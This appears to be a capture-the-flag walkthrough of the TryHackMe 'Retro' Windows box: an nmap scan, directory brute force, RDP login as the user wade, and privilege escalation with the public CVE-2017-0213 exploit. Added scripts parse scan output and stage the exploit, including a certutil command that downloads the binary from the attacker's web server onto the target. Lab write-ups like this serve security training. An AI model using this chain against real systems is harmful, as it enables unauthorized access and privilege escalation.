Challenge Link: https://tryhackme.com/room/retro
A Kali Linux 2019.1 image was used to perform the task.
The IP address of the remote machine for my session was 10.10.200.145
After kicking off the session you will note that you cannot ping the machine in question. That matters for the scan: nmap treats a host that does not answer its discovery probes as down and skips it, so -Pn is needed to scan it anyway.
Running nmap -Pn -sV 10.10.200.145 against the machine returned the following ports open.
We can clearly see that a web server and the RDP port (3389) are open for business.
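As an added example (not part of the original walkthrough), here is the scan step as a small script: it runs nmap with -Pn, parses the grepable report to list what is open, and maps each open port to the follow-up the walkthrough does by hand. The sample report embedded in it is constructed for the demo, not real output from the box, and scan_host, open_ports and next_step are my names.

```sh
#!/bin/sh
# Added example, not from the original walkthrough: scan a host that does not
# answer ping, then pull the open ports out of nmap's grepable (-oG) report so
# the next step (directory brute force on 80, RDP on 3389) can be chosen
# without reading the scan by eye.

# -Pn  skip host discovery: with ICMP blocked nmap would otherwise report the
#      host as "down" and scan nothing
# -sV  probe for service versions on the open ports
# -oG  write a one-line-per-host grepable report that open_ports parses
scan_host() {               # scan_host <target> <outfile>
    nmap -Pn -sV -oG "$2" "$1" >/dev/null
}

# Print "port/proto service" for every open port in a -oG report.
# The tab-separated Ports: field looks like
#   Ports: 80/open/tcp//http//Microsoft IIS httpd 10.0/, 3389/open/tcp//ms-wbt-server///
# entries separated by ", ", each one being
#   port/state/proto/owner/service/rpcinfo/version/
open_ports() {              # open_ports <gnmap file>
    awk -F'\t' '/^Host:.*Ports:/ {
        ports = ""
        for (i = 1; i <= NF; i++) if ($i ~ /^Ports: /) ports = substr($i, 8)
        n = split(ports, entry, ", ")
        for (j = 1; j <= n; j++) {
            split(entry[j], f, "/")
            if (f[2] == "open") print f[1] "/" f[3] " " f[5]
        }
    }' "$1"
}

# Suggest the follow-up for each open port, as done by hand in the walkthrough.
next_step() {               # next_step <port/proto>
    case "$1" in
        80/tcp|443/tcp|8080/tcp) echo "web: brute-force directories (dirbuster/gobuster), fingerprint the CMS" ;;
        3389/tcp)                echo "rdp: try any credentials found on the web app (xfreerdp)" ;;
        *)                       echo "manual review" ;;
    esac
}

# Constructed sample report (not real scan output) so the parser can be
# exercised without a target; against the box you would run
#   scan_host 10.10.200.145 scan.gnmap && open_ports scan.gnmap
SAMPLE=$(printf 'Host: 10.10.200.145 ()\tStatus: Up\nHost: 10.10.200.145 ()\tPorts: 80/open/tcp//http//Microsoft IIS httpd 10.0/, 3389/open/tcp//ms-wbt-server///, 445/filtered/tcp//microsoft-ds///\tIgnored State: filtered (997)\n')

demo() {
    tmp=$(mktemp)
    printf '%s\n' "$SAMPLE" > "$tmp"
    open_ports "$tmp" | while read -r port svc; do
        echo "$port ($svc): $(next_step "$port")"
    done
    rm -f "$tmp"
}

demo
```

The parser keys on the state field rather than on a regex over the whole line, so filtered or closed ports in the report are ignored and a version banner containing slashes or commas does not shift the columns it prints.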
A web server is running on the target. What is the hidden directory which the website lives on?
Let’s fire up dirbuster and give it a wordlist…
Very quickly we see, both on the command line and in the tool itself, that we've located the hidden directory.
You can stop the scan as we’ve already answered the first question.
Now let's take a look at the website itself.
The dirbuster output would already have told us that this is a WordPress installation (the wp-* paths it turns up give it away). A useful browser plugin, if you don't have it already, is Wappalyzer, and I'd recommend installing it.
Once installed you'll see a "W" icon in the browser bar; clicking on it gives you this:
We can now see which version of WordPress the site is running.
Now at this point I did go and install WPScan. WPScan is a WordPress vulnerability scanner. While they recommend installing it using gem install wpscan, I chose to clone from the GitHub repo (even though they don't recommend this, for some reason!) and followed the steps on the WPScan site.
What I'll say is that it turned out not to be useful for this walkthrough, but I found it interesting to run the tool against the site to see what possible vulnerabilities did exist.
If you look through the site you will see that there’s a user called Wade who seems to be posting. Indeed Wade is the only user to have posted.
Now, I'll admit this wasn't very intuitive, but you'll notice the following post.
If you click on this post you'll find something interesting.
This site does have a WordPress login, but you'd be heading up a dead end with that at this point as it doesn't help. However, we did see that port 3389 was open, so let's go and take a look.
I'm using xfreerdp to connect, but you can use whatever RDP client works for you.
Lo and behold, we're in, and right on the desktop we see user.txt.
The machine is a Windows Server 2016 box.
Open the file and you’ll have your first flag.
But how do we get the privilege escalation?!
Pretty easy, actually. Check out this site:
(Its checklist runs through: extract patches and updates; architecture; list all env variables; list all drives; get current username; list user privileges…)
You'll find a link to an exploit for CVE-2017-0213 at https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-0213. That CVE is a Windows COM elevation-of-privilege bug that Microsoft fixed in May 2017, which is why the patch-list and architecture checks from that site come first: they tell you whether the box is missing the fix and which build of the exploit you need.
On your Kali machine, go and download the zip file for the x64 architecture (the box here is 64-bit; pick the build that matches what the architecture check reported).
Unzip the executable and start a simple web server using Python.
Now, on the Windows Server 2016 machine, simply browse to your web server and download the executable.
The machine may complain about the file and ask whether you want to discard it; of course you want to keep it.
Now simply run the executable as the user wade and you'll be presented with an elevated administrator command prompt. Go and get your root.txt file.
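The RDP connection above and the staging steps that follow, as one script. This is an added example, not the walkthrough's own commands. It assumes things the page does not state: the archive names inside the SecWiki CVE-2017-0213 directory (CVE-2017-0213_x64.zip and CVE-2017-0213_x86.zip), the attacker address in ATTACKER_IP, port 8000 for the Python web server, and wade's password supplied through WADE_PASS (the default is a placeholder). certutil is used as a command-line alternative to downloading through the browser; pick_zip, rdp_cmd, windows_fetch_cmd and stage are my names.

```sh
#!/bin/sh
# Added example, not from the original walkthrough: the RDP-to-root path in
# one script. It builds the xfreerdp command for wade, stages the
# CVE-2017-0213 binary from the SecWiki repository behind a Python web
# server, and prints the command to run inside the RDP session to fetch it.
# Assumptions (none of these come from the page): the archive names in the
# SecWiki directory, our Kali address in ATTACKER_IP, the listening port 8000,
# and wade's password in WADE_PASS (taken from the blog post found earlier).

TARGET="${TARGET:-10.10.200.145}"
ATTACKER_IP="${ATTACKER_IP:-10.8.0.1}"      # assumed VPN address of the Kali box
PORT="${PORT:-8000}"
WADE_PASS="${WADE_PASS:-changeme}"          # placeholder, not the real password
REPO_RAW="https://raw.githubusercontent.com/SecWiki/windows-kernel-exploits/master/CVE-2017-0213"

# Pick the archive from what the target reports as its architecture
# (systeminfo "System Type", or %PROCESSOR_ARCHITECTURE%). The wrong build
# simply fails, so check this right after the patch list.
pick_zip() {                                # pick_zip <arch string>
    case "$1" in
        x64|AMD64|*x64-based*) echo "CVE-2017-0213_x64.zip" ;;
        x86|X86|*x86-based*)   echo "CVE-2017-0213_x86.zip" ;;
        *) echo "unsupported architecture: $1" >&2; return 1 ;;
    esac
}

# RDP session as wade; /cert:ignore accepts the self-signed certificate a lab
# box presents (check the flag spelling against your FreeRDP version).
rdp_cmd() {
    printf "xfreerdp /v:%s /u:wade /p:'%s' /cert:ignore +clipboard\n" "$TARGET" "$WADE_PASS"
}

# Command-line download to run inside the session instead of the browser.
# certutil ships with every Windows build, so it sidesteps the browser's
# "discard this file?" dialog (antivirus on the box is a separate question).
windows_fetch_cmd() {                       # windows_fetch_cmd <ip> <port> <file>
    printf 'certutil.exe -urlcache -split -f http://%s:%s/%s %s\n' "$1" "$2" "$3" "$3"
}

# Download, unpack and serve. The .exe name is read from the zip listing
# rather than assumed; -j flattens any directory inside the archive.
stage() {                                   # stage <arch string>
    zip=$(pick_zip "$1") || return 1
    mkdir -p stage && cd stage || return 1
    curl -fsSLO "$REPO_RAW/$zip" || return 1
    exe=$(basename "$(unzip -Z1 "$zip" | grep -i '\.exe$' | head -n 1)")
    [ -n "$exe" ] || { echo "no .exe inside $zip" >&2; return 1; }
    unzip -oqj "$zip"
    echo "1. connect:         $(rdp_cmd)"
    echo "2. in the session:  $(windows_fetch_cmd "$ATTACKER_IP" "$PORT" "$exe")"
    echo "3. run $exe as wade; it should drop you into an elevated prompt"
    echo "serving $exe on port $PORT (Ctrl-C to stop)"
    python3 -m http.server "$PORT"
}

# Usage: sh stage.sh x64   (with no argument the functions are only defined)
if [ $# -ge 1 ]; then
    stage "$1"
fi
```

Run it as sh stage.sh x64 once TARGET, ATTACKER_IP and WADE_PASS are exported; the architecture string can be pasted straight from the System Type line of systeminfo on the box.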